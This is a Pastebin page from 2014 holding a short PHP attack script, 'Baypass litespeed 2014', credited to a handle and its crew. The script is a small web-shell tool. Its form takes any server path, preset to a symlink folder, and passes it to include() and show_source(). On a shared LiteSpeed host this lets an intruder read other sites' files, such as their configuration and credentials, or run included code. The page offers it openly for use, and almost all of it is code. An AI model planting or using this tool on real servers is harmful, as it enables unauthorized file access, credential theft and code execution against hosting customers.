Advertisement
hamzakiller21

Baypass litespeed 2014

Apr 16th, 2014
192
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 0.54 KB | None | 0 0
  1. <form method='post'>Put Your Full Path for uir sum TRy .txt or .php<input type="text" name="path" size='70' value='/home/root/public_html/sym/dz.txt'><input type="submit" name="go"></form>
  2. <b>Hamza Ki!!ler</b><br>
  3. <center>
  4. <?php
  5. ## baypass litespeed 2014 usnig show source and include @hamza killer
  6. ## j!nix & b0x & uznuDZ & black-id
  7. if($_POST['go'])
  8. {
  9. $m=$_POST['path'];
  10. echo"<textarea cols='70' rows='30'>";
  11. $f=@include "$m";
  12. echo"</textarea><br>";
  13. echo"<br><b>Using other method </b><br>";
  14. echo show_source($m);  
  15.  
  16.  
  17. }
  18.  
  19. ?>
  20. </center>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement